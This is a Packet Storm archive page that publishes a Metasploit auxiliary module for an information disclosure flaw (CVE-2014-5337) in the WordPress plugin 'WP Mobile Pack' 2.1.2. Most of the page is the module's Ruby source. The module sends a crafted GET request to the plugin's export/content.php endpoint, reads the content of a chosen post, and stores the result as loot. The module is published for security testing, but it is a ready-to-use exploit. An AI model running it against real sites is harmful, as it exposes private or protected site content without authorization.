what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Mobile Pack Information Disclosure

WordPress Mobile Pack Information Disclosure
Posted Sep 1, 2024
Authored by Roberto S. Soares, Nitin Venkatesh | Site metasploit.com

This Metasploit module exploits an information disclosure vulnerability in WordPress Plugin "WP Mobile Pack" version 2.1.2, allowing to read files with privileges information.

tags | exploit, info disclosure
SHA-256 | 6091faba1f9f0346060b398514c9a02c65d456b6313c9ebd4ae6e2025f13b2e5

WordPress Mobile Pack Information Disclosure

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner

def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Mobile Pack Information Disclosure Vulnerability',
'Description' => %q{
This module exploits an information disclosure vulnerability in WordPress Plugin
"WP Mobile Pack" version 2.1.2, allowing to read files with privileges
information.
},
'References' =>
[
['CVE' , '2014-5337'],
['WPVDB', '8107'],
['PACKETSTORM', '132750']
],
'Author' =>
[
'Nitin Venkatesh', # Vulnerability Discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'License' => MSF_LICENSE
))

register_options(
[
OptString.new('POSTID', [true, 'The post identification to read', '1'])
])
end

def check
check_plugin_version_from_readme('wordpress-mobile-pack', '2.1.3')
end

def run_host(ip)
postid = datastore['POSTID']

begin
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'),
'vars_get' => {
'content' => 'exportarticle',
'callback' => 'exportarticle',
'articleId' => "#{postid}"
}
)
temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, ""))
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e
print_error("The following Error was encountered: #{e.class}")
return
end

if res &&
res.code == 200 &&
res.body.length > 29 &&
res.headers['Content-Type'].include?('application/json') &&
!res.body.include?('"error":')

vprint_status('Enumerating...')
res_clean = JSON.pretty_generate(temp)
vprint_good("Found:\n\n#{res_clean}\n")

path = store_loot(
'mobilepack.disclosure',
'text/plain',
ip,
res_clean
)
print_good("File saved in: #{path}")
else
print_error("Nothing was downloaded. You can try checking the POSTID parameter.")
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close